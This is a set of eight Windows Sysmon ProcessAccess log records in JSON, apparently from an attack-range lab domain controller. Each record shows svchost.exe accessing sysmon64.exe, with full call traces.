{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1416,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1417,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1418,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1419,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1420,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1421,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1422,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1423,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.221\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.221","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
